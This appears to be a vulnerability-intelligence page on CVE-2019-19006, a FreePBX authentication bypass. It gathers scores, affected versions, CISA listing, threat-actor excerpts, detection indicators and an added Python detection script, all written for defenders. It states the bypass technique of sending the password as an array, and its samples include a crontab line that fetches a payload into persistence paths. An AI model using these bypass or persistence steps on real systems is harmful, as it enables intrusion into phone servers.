CVE-2019-19006
Published 2019-11-21
Priority: P186 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Badges: KEV · ITW
CISA Known Exploited Vulnerability, remediation due 2026-02-24
Exploited in the wild
EPSS: 36.61% (98.3rd percentile)
Sangoma FreePBX 15.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control (the original CVE description reads "115.0.16.26"; the affected ranges below confirm 15.0.16.26).
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sangoma | freepbx | 13.0.0.0 – 13.0.197.13 | — |
| sangoma | freepbx | 14.0.0.0 – 14.0.13.11 | — |
| sangoma | freepbx | 15.0.0.0 – 15.0.16.26 | — |
Detection & IOCs (extracted from sources)
- CVE-2019-19006 exploitation can be detected by monitoring HTTP login requests to FreePBX where the 'password' parameter is sent as an array element (e.g., password[0]=<any_value>), which bypasses authentication by preventing session teardown.
- Detect EncystPHP web shell presence by scanning for ajax.php files in non-standard FreePBX paths such as /var/www/html/digium_phones/, /var/www/html/phones/, /var/www/html/fpbxphones/, /var/www/html/freepbxphones/, /var/www/html/freepbx/, and /var/www/html/admin/assets/.
- Alert on creation of a Linux user named 'newfpbx' with UID/GID 0 (root-equivalent), which is a persistence indicator for EncystPHP.
- Monitor for the MD5-hashed credential check pattern in PHP files on FreePBX hosts; the EncystPHP web shell uses a hard-coded MD5 hash for authentication under an interface titled 'Ask Master'.
- Detect suspicious crontab entries that repeatedly download k.php from external IPs to /var/lib/asterisk/bin/ paths (zen2, devnull2, devnull), which are persistence indicators for EncystPHP.
- Check Point IPS signature 'Sangoma FreePBX Authentication Bypass (CVE-2019-19006)' can be used to detect exploitation attempts against vulnerable FreePBX servers.
- Monitor for SIPVicious svmap scanning activity targeting FreePBX systems, as this tool is used by INJ3CTOR3 to identify vulnerable targets prior to CVE-2019-19006 exploitation.
- Detect timestamp-forging activity on FreePBX web directories: alert on 'touch' commands referencing ajax.php against legitimate footer.php timestamps, used by EncystPHP to evade detection.
- Caveat: the EncystPHP campaign described in the Fortinet report exploits CVE-2025-64328, not CVE-2019-19006 directly; the association with CVE-2019-19006 is historical (INJ3CTOR3 threat actor attribution). IOCs from the Fortinet report are operationally linked to the same threat actor but not to the original 2019 CVE exploitation infrastructure.
- Caveat: the download URL http://45.143.220.116/emo1.sh returned HTTP 404 at the time of Check Point Research analysis; its purpose was unknown and the IOC may no longer be active.
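Worked detection example, added here and not code from FreePBX, Check Point or Fortinet. It applies the indicators listed above to constructed inputs: a login request whose `password` parameter is submitted as a PHP array, a passwd file with a second UID-0 account, a crontab that fetches k.php into /var/lib/asterisk/bin/, and a file listing with ajax.php in a non-standard directory. The login endpoint path `/admin/config.php`, the sample requests, the IP address and the file contents are assumptions for illustration, not observed data.

```python
"""Detection helpers for CVE-2019-19006 exploitation and the EncystPHP persistence IOCs.

Added example; not code from FreePBX, Check Point or Fortinet. The login path and all
sample inputs below are constructed assumptions, not observed data.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the FreePBX admin login form posts to this path. Adjust for your deployment.
LOGIN_PATHS = ("/admin/config.php",)

# Non-standard directories in which the page reports EncystPHP dropping ajax.php.
WEBSHELL_DIRS = (
    "/var/www/html/digium_phones/",
    "/var/www/html/phones/",
    "/var/www/html/fpbxphones/",
    "/var/www/html/freepbxphones/",
    "/var/www/html/freepbx/",
    "/var/www/html/admin/assets/",
)
CRON_FETCH = re.compile(r"\bk\.php\b")
CRON_DEST = re.compile(r"/var/lib/asterisk/bin/(?:zen2|devnull2|devnull)\b")
ARRAY_PASSWORD = re.compile(r"^password\[")  # matches password[] and password[<index>]


def array_password_keys(encoded):
    """Names of 'password' parameters submitted as PHP array elements, after URL decoding."""
    return [k for k in parse_qs(encoded, keep_blank_values=True) if ARRAY_PASSWORD.match(k)]


def is_auth_bypass_attempt(method, url, body=""):
    """True when a request to the login endpoint carries 'password' as an array element.

    The query string is always inspected; the body is added for POST. A legitimate login
    form submits password as a scalar, so any array form is treated as a bypass attempt.
    """
    parts = urlsplit(url)
    if parts.path not in LOGIN_PATHS:
        return False
    params = [parts.query] if parts.query else []
    if method.upper() == "POST" and body:
        params.append(body)
    return any(array_password_keys(p) for p in params)


def root_alias_accounts(passwd_text):
    """Accounts other than root with UID 0 or GID 0 (EncystPHP adds 'newfpbx' this way)."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 4:
            continue
        name, uid, gid = fields[0], fields[2], fields[3]
        if name != "root" and (uid == "0" or gid == "0"):
            hits.append(name)
    return hits


def suspicious_cron_lines(crontab_text):
    """Crontab lines that fetch k.php into one of the /var/lib/asterisk/bin/ drop paths."""
    return [l for l in crontab_text.splitlines() if CRON_FETCH.search(l) and CRON_DEST.search(l)]


def webshell_candidates(paths):
    """ajax.php files located under the non-standard directories listed above."""
    return [p for p in paths if p.endswith("/ajax.php") and p.startswith(WEBSHELL_DIRS)]


# Constructed samples (not captured traffic or real host data).
SAMPLE_REQUESTS = [
    ("POST", "/admin/config.php", "username=admin&password=Secr3t&submit=Login"),
    ("POST", "/admin/config.php", "username=admin&password%5B0%5D=x&submit=Login"),
    ("GET", "/admin/config.php?username=admin&password[]=", ""),
    ("POST", "/admin/ajax.php", "password[]=x"),  # not the login endpoint: ignored
]
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin\n"
    "newfpbx:x:0:0::/root:/bin/bash\n"
)
SAMPLE_CRON = (
    "*/5 * * * * curl -s http://203.0.113.10/k.php -o /var/lib/asterisk/bin/zen2\n"
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
)
SAMPLE_FILES = ["/var/www/html/admin/ajax.php", "/var/www/html/phones/ajax.php"]


def triage():
    """Run every check over the constructed samples and return the findings."""
    return {
        "bypass_requests": [r for r in SAMPLE_REQUESTS if is_auth_bypass_attempt(*r)],
        "root_aliases": root_alias_accounts(SAMPLE_PASSWD),
        "cron": suspicious_cron_lines(SAMPLE_CRON),
        "webshells": webshell_candidates(SAMPLE_FILES),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

Standard web server access logs do not record POST bodies, so the request check needs input from a reverse proxy, WAF or packet capture that preserves bodies; the query-string case is covered by ordinary logs. The host checks read the text of /etc/passwd, the asterisk and root crontabs, and a file listing, so they can run from a forensic image as well as on a live host.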
CVSS provenance
NVD v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck: 9.8 CRITICAL
CISA: 9.8 CRITICAL
GHSA
GHSA-85h5-chmw-697j: Sangoma FreePBX 115
ghsa_unreviewed·2022-05-24
CVE-2019-19006 [HIGH] CWE-287 GHSA-85h5-chmw-697j: Sangoma FreePBX 115
Sangoma FreePBX 115.0.16.26 and below, 14.0.13.11 and below, 13.0.197.13 and below have Incorrect Access Control.
VulnCheck
Sangoma FreePBX Improper Authentication Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-19006 [CRITICAL] CWE-287 Sangoma FreePBX Improper Authentication Vulnerability
Sangoma FreePBX Improper Authentication Vulnerability
Sangoma FreePBX contains an improper authentication vulnerability that potentially allows unauthorized users to bypass password authentication and access services provided by the FreePBX admin.
Affected: Sangoma FreePBX
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://research.checkpoint.com/2020/inj3ctor3-operation-leveraging-asterisk-servers-for-monetization/; https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2026-02-24
CISA
Sangoma FreePBX Improper Authentication Vulnerability
cisa·2026-02-03·CVSS 9.8
CVE-2019-19006 [CRITICAL] CWE-287 Sangoma FreePBX Improper Authentication Vulnerability
Vulnerability: Sangoma FreePBX Improper Authentication Vulnerability
Affected: Sangoma FreePBX
Sangoma FreePBX contains an improper authentication vulnerability that potentially allows unauthorized users to bypass password authentication and access services provided by the FreePBX admin.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.freepbx.org/display/FOP/2019-11-20%2BRemote%2BAdmin%2BAuthentication%2BBypass ; https://nvd.nist.gov/vuln/detail/CVE-2019-19006
Remediation Due Date: 2026-02-24
No detection rules found.
No public exploits indexed.
Fortinet
Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
blogs_fortinet·2026-01-28·CVSS 9.8
[CRITICAL] Unveiling the Weaponized Web Shell EncystPHP | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Unveiling the Weaponized Web Shell EncystPHP
A persistent FreePBX web shell enabling long-term administrative compromise
By Vincent Li | January 28, 2026
Affected Platforms: FreePBX Endpoint Manager v17.0.2.36 – v17.0.3
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX v
Checkpoint
9th November – Threat Intelligence Bulletin
blogs_checkpoint·2020-11-09
CVE-2019-19006 9th November – Threat Intelligence Bulletin
## 9th November – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 9th November, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Check Point Research has alerted against a wave of ransomware attacks targeting Israeli companies and corporations, using known ransomware families such as REvil and Ryuk, as well as a new family called ‘Pay2Key’. The ransomware is capable of rapid lateral movement within the company network.
Check Point SandBlast Agen
Checkpoint
INJ3CTOR3 Operation – Leveraging Asterisk Servers for Monetization
blogs_checkpoint·2020-11-05·CVSS 9.8
CVE-2019-19006 [CRITICAL] INJ3CTOR3 Operation – Leveraging Asterisk Servers for Monetization
## INJ3CTOR3 Operation – Leveraging Asterisk Servers for Monetization
Research by : Ido Solomon, Ori Hamama and Omer Ventura, Network Research
## Intro
Recently, Check Point Research enco
Threat Intel
INJ3CTOR3
threat_intel·CVSS 9.8
CVE-2019-19006 [CRITICAL] INJ3CTOR3
# Threat Actor: INJ3CTOR3
## Description
INJ3CTOR3 is a threat actor first identified in 2020, known for targeting vulnerabilities in VoIP systems, specifically CVE-2019-19006 and CVE-2021-45461. Their operations involve exploiting FreePBX vulnerabilities to deploy PHP web shells for data exfiltration and persistence. The group utilizes tools for SIP server exploitation, including brute-force scripts and authentication bypass techniques. Observations indicate a resurgence of their attack patterns, reflecting historical behaviors while adapting to current vulnerabilities.
Greynoiseio
NoiseLetter February 2026
blogs_greynoiseio
NoiseLetter February 2026
NCSC
Organisational use of Enterprise Connected Devices
ncsc·2022-05-10
Organisational use of Enterprise Connected Devices
Report Download & print article PDF Download & print article PDF
## Organisational use of Enterprise Connected Devices Assessing the cyber security threat to UK organisations using Enterprise Connected Devices.
## Introduction
This paper aims to provide an assessment of the current cyber security threat to Enterprise Connected Devices. This information will be of interest to industry and any person using a connected device.
Devices used and deployed by organisations have changed dramatically in recent years. From enabling remote and flexible working to improving efficiency and productivity, these devices are broad in scope and frequently rely on their ability to be connected; with this comes increased risk.
In collaboration with DCMS, the NCSC have begun the process of assessing the l
References
- https://community.freepbx.org/t/freepbx-security-vulnerability-sec-2019-001/62772
- https://pastebin.com/2CdsQMKW
- https://wiki.freepbx.org/display/FOP/2019-11-20+Remote+Admin+Authentication+Bypass
- https://www.freepbx.org/category/blog/
- https://research.checkpoint.com/2020/inj3ctor3-operation-leveraging-asterisk-servers-for-monetization/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-19006
Timeline
2019-11-21: Published
2026-02-03: Added to CISA KEV
Exploited in the wild